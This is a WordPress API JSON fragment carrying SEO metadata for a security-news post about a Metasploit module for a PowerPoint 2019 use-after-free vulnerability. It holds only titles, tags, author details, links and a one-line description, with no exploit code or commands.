class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28306#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28306\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315\",\"datePublished\":\"2025-12-02T15:33:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28306\"},\"wordCount\":3342,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28306#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28306\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28306\",\"name\":\"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-02T15:33:20+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28306#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28306\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28306#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=28306","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315 - zero redgem","og_description":"{“lastseen”:”2025-12-02T19:42:10″,”description”:”This Metasploit module exploits a use-after-free vulnerability in Microsoft PowerPoint that allows remote code execution when a user opens a specially crafted PPTX file. The...","og_url":"https:\/\/zero.redgem.net\/?p=28306","og_site_name":"zero redgem","article_published_time":"2025-12-02T15:33:20+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"17 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=28306#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=28306"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315","datePublished":"2025-12-02T15:33:20+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=28306"},"wordCount":3342,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=28306#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=28306","url":"https:\/\/zero.redgem.net\/?p=28306","name":"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-02T15:33:20+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=28306#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=28306"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=28306#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Microsoft PowerPoint 2019 Use-After-Free_PACKETSTORM:212315"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28306","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28306"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28306\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=28306"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=28306"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=28306"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}